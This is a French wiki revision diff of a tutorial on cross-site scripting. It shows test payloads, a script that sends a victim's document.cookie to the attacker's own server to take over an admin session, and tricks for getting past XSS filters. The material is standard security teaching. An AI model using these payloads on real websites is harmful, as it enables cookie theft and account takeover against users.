Outils pour utilisateurs

Outils du site


web:injection_xss

Différences

Ci-dessous, les différences entre deux révisions de la page.

Lien vers cette vue comparative

Les deux révisions précédentes Révision précédente
Prochaine révision
Révision précédente
web:injection_xss [2016/03/01 11:24]
yorin
web:injection_xss [2016/04/15 14:33]
yorin Ortho
Ligne 1: Ligne 1:
-Failles XSS:+**Failles XSS**
  
 Le cross-site scripting (abrégé XSS), est un type de faille de sécurité des sites web permettant d'​injecter du contenu dans une page. Elle permet ainsi de provoquer des actions sur les navigateurs web visitant la page. Le cross-site scripting (abrégé XSS), est un type de faille de sécurité des sites web permettant d'​injecter du contenu dans une page. Elle permet ainsi de provoquer des actions sur les navigateurs web visitant la page.
Ligne 7: Ligne 7:
 Comment la détecter : Comment la détecter :
  
-Dans les formulaires les personnes sont censées entrer des données "formater" d'une certaine façon.+Dans les formulaires les personnes sont censées entrer des données "formatées" d'une certaine façon.
  
-Par exemple dans un champs pseudo on s’attend à ce que la personne ​rentre ​quelque chose comme : isileaks ou is1leaks.+Par exemple dans un champs pseudo on s’attend à ce que la personne ​entre quelque chose comme : isileaks ou is1leaks.
  
 Si nous rentrons cela : Si nous rentrons cela :
Ligne 23: Ligne 23:
 Le code html c'est gentil mais injectons quelque chose de plus sérieux : Le code html c'est gentil mais injectons quelque chose de plus sérieux :
  
-Du javascript  ​:+Du javascript ​:
  
 <​code><​script>​ alert('​coucou'​) </​script></​code>​ <​code><​script>​ alert('​coucou'​) </​script></​code>​
Ligne 32: Ligne 32:
  
  
-**Méthode ​1:**+__Méthode ​1:__
  
 On va injecter notre code javascript sur le site faillible On va injecter notre code javascript sur le site faillible
Ligne 52: Ligne 52:
 Le code que je vous ai donné n'aura pas d’effet grave sur la victime mais vous pouvez faire de grandes choses avec du JS. Le code que je vous ai donné n'aura pas d’effet grave sur la victime mais vous pouvez faire de grandes choses avec du JS.
  
-Méthode ​2:+__Méthode ​2: CSRF__
  
 La CSRF (Cross-Site Request Forgery) est une attaque visant à faire exécuter une action à un utilisateur sans qu'il en soit conscient. La CSRF (Cross-Site Request Forgery) est une attaque visant à faire exécuter une action à un utilisateur sans qu'il en soit conscient.
Ligne 64: Ligne 64:
 <​code><​script>​window.open("​http://​monserveur/​mapage.php?​cookie="​+document.cookie)</​script></​code>​ <​code><​script>​window.open("​http://​monserveur/​mapage.php?​cookie="​+document.cookie)</​script></​code>​
  
-Ce code javascript ​à pour effet d'​envoyer le contenu du cookie vers votre site web+Ce code javascript ​pour effet d'​envoyer le contenu du cookie vers votre site web.
  
 De votre coté il vous faudra un serveur web ainsi qu'une page php contenant: De votre coté il vous faudra un serveur web ainsi qu'une page php contenant:
Ligne 108: Ligne 108:
 Pour consulter cette valeur il vous suffira de vous rendre sur la page getCookie.log qui va se crée automatiquement. Pour consulter cette valeur il vous suffira de vous rendre sur la page getCookie.log qui va se crée automatiquement.
  
-En cas d'​authentification par cookie vous pourrez vous connecter en tant qu'​admin+En cas d'​authentification par cookie vous pourrez vous connecter en tant qu'​admin.
  
 ByPassing des protections contre les XSS: ByPassing des protections contre les XSS:
  
-Il arrive parfois que des protections soient ​mise en place pour empêcher ce genre d'​attaque,​ voici quelque ​techniques pour bypasser ces protections.+Il arrive parfois que des protections soient ​mises en place pour empêcher ce genre d'​attaque,​ voici quelques ​techniques pour bypasser ces protections.
  
 __Bypassing magic_quotes_gpc :__ __Bypassing magic_quotes_gpc :__
Ligne 131: Ligne 131:
 __Bypassing par obfuscation :__ __Bypassing par obfuscation :__
  
-Il arrive parfois qu'un administrateur de site un peu feignant ne daigne pas insérer une réel protection et filtre les mots script, alert etc ...+Il arrive parfois qu'un administrateur de site un peu feignant ne daigne pas insérer une réelle ​protection et filtre les mots script, alert etc ...
 un simple <​code><​ScRiPt>​AlErT("​Coucou"​);</​sCrIpT></​code>​ fera l'​affaire !  un simple <​code><​ScRiPt>​AlErT("​Coucou"​);</​sCrIpT></​code>​ fera l'​affaire ! 
  
web/injection_xss.txt · Dernière modification: 2016/07/04 08:38 (modification externe)